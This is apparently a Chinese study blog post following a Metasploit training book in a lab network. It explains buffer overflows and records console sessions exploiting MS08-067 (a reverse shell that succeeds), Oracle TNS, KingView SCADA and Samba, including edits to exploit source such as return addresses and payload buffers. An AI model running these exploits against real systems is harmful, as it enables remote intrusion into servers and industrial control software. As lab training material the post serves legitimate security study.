《Metasploit 魔鬼训练营》05 网络服务渗透攻击

本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程

内存攻防技术

MS08-067 攻击案例

Oricle 数据库

KingView 6.53 HistorySrv 渗透攻击

Samba 安全漏洞

###1.内存攻防技术 ###

内存攻击指的是攻击者利用软件安全漏洞，构造恶意输人导致软件在处理输人数据时出现非预期错误，将输人数据写人内存中的某些特定敏感位置，从而劫持软件控制流，转而执行外部输人的指令代码，造成目标系统被获取远程控制或被拒绝服务。内存攻击的表面原因是软件编写错误，诸如过滤输人的条件设置缺陷、变量类型转换错误、逻辑判断错误、指针引用错误等;但究其根本原因，是现代电子计算机在实现图灵机模型时，没有在内存中严格区分数据和指令，这就存在程序外部输人数据成为指令代码从而被执行的可能。任何操作系统级别的防护措施都不可能完全根除现代计算机体系结构上的这个弊端，而只是试图去阻止攻击者利用(Exploit)。因此，攻防两端围绕这个深层次原因的利用与防护，在系统安全领域你来我往进行了多年的博弈，推动了系统安全整体水平的螺旋式上升。

1. 缓冲区溢出
 http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html
 缓冲区溢出(Buffer Overflow 或Buffer Overrun) 漏洞是程序由于缺乏对缓冲区的边界
 条件检查而引起的一种异常行为，通常是程序向缓冲区中写数据，但内容超过了程序员设
 定的缓冲区边界，从而覆盖了相邻的内存区域，造成覆盖程序中的其他变量甚至影响控制
 流的敏感数据造成程序的非预期行为。而C 和C++ 语言缺乏内在安全的内存分配与管理机
 制，因此很容易导致缓冲区溢出相关的问题。
堆溢出
 http://www.freebuf.com/vuls/98404.html
 http://blog.csdn.net/aemperor/article/details/47310593
 http://blog.csdn.net/stonesharp/article/details/50766429

###2.MS08-067 攻击案例 ###


 MS08-067 漏洞是通过MSRPC over SMB 通道调用Server 服务程序中的NetPathCanonicalize 函
数时触发的，而NetPathCanonicalize 函数在远程访问其他主机时，会调用NetpwPathCanonicalize
函数，对远程访问的路径进行规范化，而在NetpwPathCanonicalize 函数中发生了栈缓冲区内存
错误，造成可被利用实施远程代码执行。
 所谓的路径规范化，就是将路径字符串中的" 转换为",同时去除相对路径"\\" 和"\.\"。如下所示:
 n**\*\.\**"  =>  "**\*\**"
 "**\*\..\**" =>  "**\**"
 在路径规范化的操作中，服务程序对路径字符串的地址空间检查存在逻辑漏洞。攻击
者精心设计的输人路径，可以在函数去除"\.\" 字符串时，把路径字符串中的内容复制到路
径串之前的地址空间中(低地址)，达到覆盖函数返回地址，执行任意代码的目的。
 

msf > search ms08_067
 Matching Modules
 ================
    Name                                 Disclosure Date  Rank   Description
    ----                                 ---------------  ----   -----------
    exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > show payloads 
 set 
 Compatible Payloads
 ===================

    Name                                                Disclosure Date  Rank    Description
    ----                                                ---------------  ----    -----------
    generic/custom                                                       normal  Custom Payload
    generic/debug_trap                                                   normal  Generic x86 Debug Trap
    generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline
    generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline
    ..............................
    ..............................
    ..............................
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp 
 payload => generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > show options 
 Module options (exploit/windows/smb/ms08_067_netapi):
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST    192.168.10.128   yes       The target address
    RPORT    445              yes       The SMB service port (TCP)
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
 Payload options (generic/shell_reverse_tcp):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST  10.10.10.128     yes       The listen address
    LPORT  5000             yes       The listen port
 Exploit target:
    Id  Name
    --  ----
    6   Windows XP SP3 English (AlwaysOn NX)
    
msf exploit(ms08_067_netapi) > show targets 
 Exploit targets:
    Id  Name
    --  ----
     0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
    3   Windows 2003 SP0 Universal
    4   Windows XP SP2 English (AlwaysOn NX)
     5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
    ..............................
    ..............................
    ..............................
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130
 RHOST => 10.10.10.130
msf exploit(ms08_067_netapi) > set LPORT 5000
 LPORT => 5000
msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128
 LHOST => 10.10.10.128
msf exploit(ms08_067_netapi) > set target 3  # 选择靶机系统的版本类型的ID
 target => 3
msf exploit(ms08_067_netapi) > show options 
 Module options (exploit/windows/smb/ms08_067_netapi):
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST    10.10.10.130     yes       The target address
    RPORT    445              yes       The SMB service port (TCP)
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
 Payload options (generic/shell_reverse_tcp):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST  10.10.10.128     yes       The listen address
    LPORT  5000             yes       The listen port
 Exploit target:
    Id  Name
    --  ----
    3   Windows 2003 SP0 Universal
    
msf exploit(ms08_067_netapi) > exploit 
 [*] Started reverse TCP handler on 10.10.10.128:5000 
 [*] 10.10.10.130:445 - Attempting to trigger the vulnerability...
 [*] Command shell session 2 opened (10.10.10.128:5000 -> 10.10.10.130:1397) at 2017-09-19 03:11:10 -0400
 Microsoft Windows [Version 5.2.3790]
 (C) Copyright 1985-2003 Microsoft Corp.
 C:\WINDOWS\system32>ipconfig/all     
 ipconfig/all
 Windows IP Configuration
    Host Name . . . . . . . . . . . . : root-tvi862ubeh
    Primary Dns Suffix  . . . . . . . : 
    Node Type . . . . . . . . . . . . : Unknown
    IP Routing Enabled. . . . . . . . : No
    WINS Proxy Enabled. . . . . . . . : No
 Ethernet adapter Local Area Connection:
    Connection-specific DNS Suffix  . : 
    Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
    Physical Address. . . . . . . . . : 00-0C-29-DB-51-D2
    DHCP Enabled. . . . . . . . . . . : No
    IP Address. . . . . . . . . . . . : 10.10.10.130
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 10.10.10.254
 C:\WINDOWS\system32>

###3.Oricle 数据库 ###

msf > use exploit/windows/oracle/tns_auth_sesskey 
msf exploit(tns_auth_sesskey) > show options 
 Module options (exploit/windows/oracle/tns_auth_sesskey):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  1521             yes       The target port (TCP)
    SID    ORCL             yes       The target database SID
 Exploit target:
    Id  Name
    --  ----
    0   Automatic
msf exploit(tns_auth_sesskey) > set RHOST 10.10.10.130
 RHOST => 10.10.10.130
 msf exploit(tns_auth_sesskey) > show targets 
 Exploit targets:
    Id  Name
    --  ----
    0   Automatic
    1   Oracle 10.2.0.1.0 Enterprise Edition
    2   Oracle 10.2.0.4.0 Enterprise Edition
msf exploit(tns_auth_sesskey) > set target 1
 target => 1
msf exploit(tns_auth_sesskey) > show options 
 Module options (exploit/windows/oracle/tns_auth_sesskey):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST  10.10.10.130     yes       The target address
    RPORT  1521             yes       The target port (TCP)
    SID    ORCL             yes       The target database SID
 Exploit target:
    Id  Name
    --  ----
    1   Oracle 10.2.0.1.0 Enterprise Edition
msf exploit(tns_auth_sesskey) > exploit 
 [*] Started reverse TCP handler on 10.10.10.128:4444 
 [*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
 [*] 10.10.10.130:1521 - Sending NSPTCN packet ...
 [*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
 [*] 10.10.10.130:1521 - Sending NA packet ...
 [*] 10.10.10.130:1521 - Sending TTIPRO packet ...
 [*] 10.10.10.130:1521 - Sending TTIDTY packet ...
 [-] 10.10.10.130:1521 - Exploit failed: EOFError EOFError
 [*] Exploit completed, but no session was created.
#修改源代码： 
root@attacker:/usr/share/metasploit-framework/modules/exploits/windows/oracle# vim tns_auth_sesskey.rb 
 # build exploit buffer
    print_status("Calling kpoauth with long AUTH_SESSKEY ...")
    sploit = payload.encoded
    sploit << rand_text_alphanumeric(0x19a - 0x17e + 0x10)  # 209行增加0x10
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8 + 5 + 0x20     # 211行增加0x20 
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
#重新利用（我没做成功，书上是这么做的，以后发现方法会更正）
msf exploit(tns_auth_sesskey) > rexploit 
 [*] Reloading module...
 [*] Started reverse TCP handler on 10.10.10.128:4444 
 [*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
 [*] 10.10.10.130:1521 - Sending NSPTCN packet ...
 [*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
 [*] 10.10.10.130:1521 - Sending NA packet ...
 [*] 10.10.10.130:1521 - Sending TTIPRO packet ...
 [*] 10.10.10.130:1521 - Sending TTIDTY packet ...
 [-] 10.10.10.130:1521 - Exploit failed: EOFError EOFError
 [*] Exploit completed, but no session was created.

###4.KingView 6.53 HistorySrv 渗透攻击 ###

 http://www.cnblogs.com/justforfun12/p/5256405.html
 google 下载 http://www.securityfocus.com/bid/45727/exploit 
 链接：http://pan.baidu.com/s/1c2GTDJy 密码：zhzj
 放置在 /usr/share/metasploit-framework/modules/exploits/windows/scada 目录
 把 45727.rb 改名为 KingView6.53overflow.rb
 
msf > search kingview
 Matching Modules
 ================
    Name                                              Disclosure Date  Rank    Description
    ----                                              ---------------  ----    -----------
    exploit/windows/fileformat/kingview_kingmess_kvl  2012-11-20       normal  KingView Log File Parsing Buffer Overflow
    exploit/windows/scada/KingView6.53overflow                         good    Kingview 6.53 SCADA HMI HistorySvr Heap Overflow
msf > use exploit/windows/scada/KingView6.53overflow 
msf exploit(KingView6.53overflow) > show options 
 Module options (exploit/windows/scada/KingView6.53overflow):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  777              yes       The target port (TCP)
 Exploit target:
    Id  Name
    --  ----
    0   Windows XP SP1
msf exploit(KingView6.53overflow) > set RHOST 10.10.10.130
 RHOST => 10.10.10.130
msf exploit(KingView6.53overflow) > show targets 
 Exploit targets:
    Id  Name
    --  ----
    0   Windows XP SP1
    1   Windows XP SP3 EN
msf exploit(KingView6.53overflow) > set target 1
 target => 1
msf exploit(KingView6.53overflow) > show options 
 Module options (exploit/windows/scada/KingView6.53overflow):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST  10.10.10.130     yes       The target address
    RPORT  777              yes       The target port (TCP)
 Exploit target:
    Id  Name
    --  ----
    1   Windows XP SP3 EN
msf exploit(KingView6.53overflow) > exploit 
 [*] Started reverse TCP handler on 10.10.10.128:4444 
 [*] 10.10.10.130:777 - Trying target Windows XP SP3 EN
 [*] Exploit completed, but no session was created.

#修改配置文件 
root@attacker:/usr/share/metasploit-framework/modules/exploits/windows/scada# vim KingView6.53overflow.rb 
 'Targets'  =>
 [
  [ 'Windows XP SP1', {'Ret' => 0x77ED73B4} ], #UnhandledExceptionFilter() in kernel32.dll
  [ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ],
  [ 'Windows 2003 SP0 EN', {'Ret' => 0x00A1FB84} ],#New target  52行
 ],
msf exploit(KingView6.53overflow) > reload
 [*] Reloading module...
msf exploit(KingView6.53overflow) > show targets 
 Exploit targets:

    Id  Name
    --  ----
    0   Windows XP SP1
    1   Windows XP SP3 EN
    2   Windows 2003 SP0 EN
msf exploit(KingView6.53overflow) > set target 2
 target => 2
msf exploit(KingView6.53overflow) > exploit 
 [*] Started reverse TCP handler on 10.10.10.128:4444 
 [*] 10.10.10.130:777 - Trying target Windows 2003 SP0 EN
 [*] Exploit completed, but no session was created.

#修改配置文件
root@attacker:/usr/share/metasploit-framework/modules/exploits/windows/scada# vim KingView6.53overflow.rb 
'Targets'  =>
 [
  [ 'Windows XP SP1', {'Ret' => 0x77ED73B4} ], #UnhandledExceptionFilter() in kernel32.dll
  [ 'Windows XP SP3 EN', {'Ret' => 0x00A1FB84} ],
  [ 'Windows 2003 SP0 EN 1', {'Ret' => 0x00B404B4} ],#New target
 ]，
 'DisclosureDate' => "9/28/2010",
 'DefaultTarget' => 0))
elsif target.name = ~/2003 SP0 EN 1/
   #sploit << make_nops(1024)
 sploit << make_nops(1024)
 sploit << "\xC4\x04\xB4\x00"
 sploit << payload.encoded
 sploit << "\x44"*(31752-payload.encoded.length)
 sploit << [target.ret].pack('V')
   
#重新测试
msf exploit(KingView6.53overflow) > reload
 [*] Reloading module...
msf exploit(KingView6.53overflow) > show targets 
 Exploit targets:
    Id  Name
    --  ----
    0   Windows XP SP1
    1   Windows XP SP3 EN
    2   Windows 2003 SP0 EN 1
msf exploit(KingView6.53overflow) > set target 2
 target => 2
msf exploit(KingView6.53overflow) > show options 
 Module options (exploit/windows/scada/KingView6.53overflow):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST  10.10.10.130     yes       The target address
    RPORT  777              yes       The target port (TCP)
 Payload options (windows/meterpreter/reverse_tcp):
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST     10.10.10.128     yes       The listen address
    LPORT     4444             yes       The listen port
 Exploit target:
    Id  Name
    --  ----
    2   Windows 2003 SP0 EN 1
msf exploit(KingView6.53overflow) > exploit  #书上这步已经成功了
[*] Exploit completed, but no session was created.

###5.Samba 安全漏洞 ###

 /usr/share/metasploit-framework/modules/exploits/linux/samba/chain_reply.rb
 
msf > search chain_reply
 Matching Modules
 ================
    Name                             Disclosure Date  Rank  Description
    ----                             ---------------  ----  -----------
    exploit/linux/samba/chain_reply  2010-06-16       good  Samba chain_reply Memory Corruption (Linux x86)

msf > search chain_reply
 Matching Modules
 ================
    Name                             Disclosure Date  Rank  Description
    ----                             ---------------  ----  -----------
    exploit/linux/samba/chain_reply  2010-06-16       good  Samba chain_reply Memory Corruption (Linux x86)
msf > use exploit/linux/samba/chain_reply 
 msf exploit(chain_reply) > show targets 
 Exploit targets:
    Id  Name
    --  ----
    0   Linux (Debian5 3.2.5-4lenny6)
    1   Debugging Target
msf exploit(chain_reply) > set target 0
 target => 0
msf exploit(chain_reply) > show options 
 Module options (exploit/linux/samba/chain_reply):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST  10.10.10.254     yes       The target address
    RPORT  139              yes       The target port (TCP)
 Exploit target:
    Id  Name
    --  ----
    0   Linux (Debian5 3.2.5-4lenny6)

# 修改ubuntu 系统
root@gate:~# echo /proc/sys/kernel/randomize_va_space
# 查找 Samba 服务进程号，随后将 GDB 附加到 Samba 服务进程中，并设置为跟踪子进程
root@gate:~# ps aux | grep smbd
 root      5080  0.0  0.1   7724  1708 ?        Ss   Sep18   0:00 /usr/sbin/smbd -D
 root      5084  0.0  0.0   7724   816 ?        S    Sep18   0:00 /usr/sbin/smbd -D
 root      6828  0.0  0.0   3004   760 pts/1    R+   09:20   0:00 grep --color=auto smbd
  
#继续 msf
msf exploit(chain_reply) > exploit 
 [*] Started reverse TCP handler on 10.10.10.128:4444 
 [*] 10.10.10.254:139 - Trying return address 0x081ed5f2...
 [*] 10.10.10.254:139 - Trying return address 0x081ed5f2...
root@gate:~# cd /usr/sbin/
root@gate:/usr/sbin# gdb --pid 5080
 GNU gdb 6.8-debian
 0xb7cea410 in __kernel_vsyscall ()
 (gdb) set follow-fork-mode child
 (gdb) c
 Continuing.

###6. ###